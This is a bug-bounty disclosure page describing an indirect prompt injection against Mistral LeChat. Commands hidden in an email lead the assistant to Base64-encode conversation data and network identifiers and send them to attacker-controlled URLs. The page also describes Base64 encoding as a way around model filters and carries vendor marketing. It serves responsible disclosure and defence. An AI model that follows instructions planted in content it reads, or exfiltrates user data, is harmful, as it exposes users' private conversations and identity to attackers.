0xF80B23C1: Mistral LeChat Data Exfiltration via Email

Mistral LeChat Data Exfiltration via Email Embedded Indirect Prompt Injection

Case GUID: f80b23c1-26cb-4484-8ea2-0e7a82867931

Summary

An indirect prompt injection vulnerability has been discovered affecting Mistral LeChat. The specific flaw exploits the model's instruction processing by embedding malicious commands within an email destined to a victim that leverages LeChats email capabilities. Base64 encoding is leveraged to exfiltrate conversation data and network identifiers (i.e: IP address, browser user-agent) to attacker controlled URLs.

Unlock the Full Intelligence Report

This disclosure is part of the 0DIN Threat Feed. Customers get access to:

Full Prompts & Variants

Detection Signatures

API Access

Full Data Export

Trend Analysis

Early Access

Request a Demo Learn About Threat Feed

Metadata

Social Impact Score

Level 1: Minimal Risk

The violation poses very low societal risk, limited primarily to nuisance or minor policy breaches. Impact is contained, affecting individual users without broader implications.

Example: Circumventing minor content filters for benign content, such as inappropriate language filters in non-public conversations.

Potential Consequences: Limited harm, potentially reputational for the AI provider.

Taxonomies

Stratagems

This involves clever and unorthodox tactics designed to deceive the model, often requiring an understanding of its operational mechanics to achieve desired outcomes.

Meta Prompting

This technique focuses on manipulating the prompting process itself to influence the model's behavior and responses, often by employing higher-level prompting strategies.

Deceptive Formatting

A prompt injection in the most pure sense, formatting the user prompt to fabricate the appearance of system instructions, a database query, its own prediction, or some other source of input a guard railed AI system might be expecting, causing it to behave in insecure ways based on the fabricated context from an adversarially formatted user prompt.

Language

This category focuses on the use of specific linguistic techniques, such as prompt injection or stylization, to influence the model's output.

Code and Encode

This strategy encompasses techniques that utilize various coding methods, such as Base64 or ROT13, to bypass model restrictions and manipulate outputs.

Base64

This technique involves encoding data into a Base64 format, which is a method of converting binary data into an ASCII string format. This technique can be used to bypass certain content filters or restrictions imposed by language models. By encoding prompts or payloads in Base64, users can potentially manipulate the model's responses or access information that may be restricted in its original form. This method leverages the model's ability to decode and interpret the encoded data, allowing for creative and strategic interactions.

About 0Din.ai

The 0Day Investigative Network (0DIN) was founded by Mozilla in 2024 to reward responsible researchers for their efforts in securing GenAI models. Learn more and submit discoveries at https://0din.ai.

Automate Your AI Security Testing

This vulnerability was discovered through 0DIN's bug bounty program. Want to find issues like this in your own models? 0DIN Scanner turns our human-sourced threat intelligence into automated security assessments.

400+ Attack Probes

Derived from real bug bounties and security research

18+ AI Providers Supported

OpenAI, Azure, Anthropic, AWS Bedrock, and more

Automated Scheduling

Run recurring scans with real-time monitoring

Actionable Metrics

Attack Success Rate (ASR) scoring with 90-day trend analysis

Request a Scanner Demo Learn More About Scanner

Severity

Low

Security Boundary

Guardrail Jailbreak

Models

Mistral Mistral Large

Disclosed On

2025-08-27 (7 months)

Disclosure Policy

Published On

2026-03-05 (13 days)

Credit

neuroXploit